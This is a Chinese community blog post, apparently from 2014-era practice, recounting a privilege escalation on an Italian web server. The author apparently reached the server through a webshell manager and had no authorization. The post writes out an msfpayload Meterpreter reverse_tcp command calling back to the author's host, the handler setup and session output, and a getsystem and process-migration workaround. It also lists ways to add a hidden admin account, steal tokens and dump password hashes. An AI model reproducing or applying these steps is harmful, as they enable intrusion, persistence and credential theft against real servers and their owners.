AI 助理
备案控制台
开发者社区 安全 文章 正文

记一次提权添加管理员实战案例

2023-09-29 66
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 记一次提权添加管理员实战案例

0x01 前言

这个案例记录的是笔者2014年测试的一台服务器,闲着无聊之时在“中国菜刀”上找了一个以前的意大利站点做测试,这是很久以前的站了,都忘了有没有提权过了,试了下刚放出来的CVE-2014-4113都失败了,执行后无回显。


0x02 实战提权过程

首先我们先利用Metasploit的msfpayload命令生成一个普通的exe载荷上传至目标可读写目录中,配置好监听模块的相关参数,然后执行即可得到一个普通权限的会话。

    msfpayload windows/meterpreter/reverse_tcp lhost=1*3.2*1.*7.*7 lport=7777 X > /media/sf_系统学习/test.exe


    注:这里提一下为什么我们生成载荷时填的公网IP,而在配置监听模块时填的内网IP?那是因为当时是用本地局域网的kali进行测试的,最后是用路由器的端口映射功能将Kali的7777端口映射出来的。

      msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
msf exploit(handler) > set LPORT 7777
msf exploit(handler) > exploit 
[*] Started reverse handler on 192.168.1.4:7777 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 6*.7*.2*3.5*
[*] Meterpreter session 6 opened (192.168.1.4:7777 -> 6*.7*.2*3.5*:2446) at 2014-10-26


      习惯性的先执行了下getsystem命令居然成功将权限提升至SYSTEM,接着测试了下其它命令,当我们测试到shell命令时发现虽然已经进入到命令终端了,但是依旧为zorro\iwam_server普通权限。


      通过Google搜索看到Hak5安全社区中有人也提到过类似问题,解决办法大概意思就是说我们需要先将当前会话的进程迁移至Admin/System权限运行的进程上去,然后才能有权限添加管理员用户。

      Before meterpreter will drop into a shell with system privileges, it first has to migrate to a process with system privs. If you drop directly in like I was doing you'll have whatever privs the browser was running with. 
After the migration to a process with sys/admin privs, if you drop into a shell you'll have sys privs.


      目前因权限不够而暂时无法直接在命令终端添加管理员用户,那么还有什么方法可以添加管理员用户或者得到目标管理员的密码呢?这里笔者另外提供几种思路,仅供参考,1-2断开会话,3-5已成功!


      (1) run getgui -u test$ -p 123456(添加管理员)


      (2) migrate 3760(迁移到system运行的进程)


      (3) use incognito(加载incognito扩展)


      (4) hashdump(获取系统hash值并破解)


      (5) 其它方法,如:mimikatz扩展、smart_hashdump模块等方法


      文章标签:
      Shell
      数据安全/隐私保护
      网络架构
      安全
      潇湘信安
      目录
      相关文章
      猫头虎
      |
      Kubernetes Cloud Native Linux
      10个Linux命令,每个管理员都应该知道
      10个Linux命令,每个管理员都应该知道
      猫头虎
      67 1
      潇湘信安
      |
      安全 PHP Apache
      记一次匈牙利服务器提权案例
      记一次匈牙利服务器提权案例
      潇湘信安
      91 0
      潇湘信安
      |
      开发框架 安全 .NET
      星外虚拟主机提权实战案例
      星外虚拟主机提权实战案例
      潇湘信安
      199 0
      潇湘信安
      |
      开发框架 安全 .NET
      VHAdmin虚拟主机提权实战案例
      VHAdmin虚拟主机提权实战案例
      潇湘信安
      108 0
      久绊A
      |
      4月前
      |
      Linux Shell 数据安全/隐私保护
      Linux用户账户管理精髓:创建、删除、密码与会话管理全攻略
      本文档介绍了Linux系统中用户账户管理的关键操作,包括创建与删除用户、设置及修改密码、用户切换与会话管理等内容。通过理论说明与具体命令示例,如使用`useradd`、`userdel`、`passwd`和`su`等命令,帮助系统管理员更好地掌握这些基本技能,从而有效提升系统的安全性和管理效率。此外,还介绍了如何利用`screen`等工具进行会话管理,确保即便在网络中断的情况下也能维持会话的持续运行。
      久绊A
      123 3
      潇湘信安
      |
      安全 关系型数据库 MySQL
      黑吃黑Getshell到提权实战案例
      黑吃黑Getshell到提权实战案例
      潇湘信安
      331 0
      潇湘信安
      |
      运维 关系型数据库 MySQL
      绕过360安全卫士提权实战案例
      绕过360安全卫士提权实战案例
      潇湘信安
      432 1
      潇湘信安
      |
      XML 开发框架 安全
      记一次后门爆破到提权实战案例
      记一次后门爆破到提权实战案例
      潇湘信安
      101 0
      拉格朗日(Lagrange)
      |
      前端开发
      javahweb1登陆案例
      javahweb1登陆案例
      拉格朗日(Lagrange)
      104 0
      javahweb1登陆案例
      Zacarx
      |
      安全 JavaScript Unix
      【总结】提权基础与五种姿势
      本次总结主要是讲解什么是提权以及常见的五个linux提权漏洞,适合初学者进阶。
      Zacarx
      208 0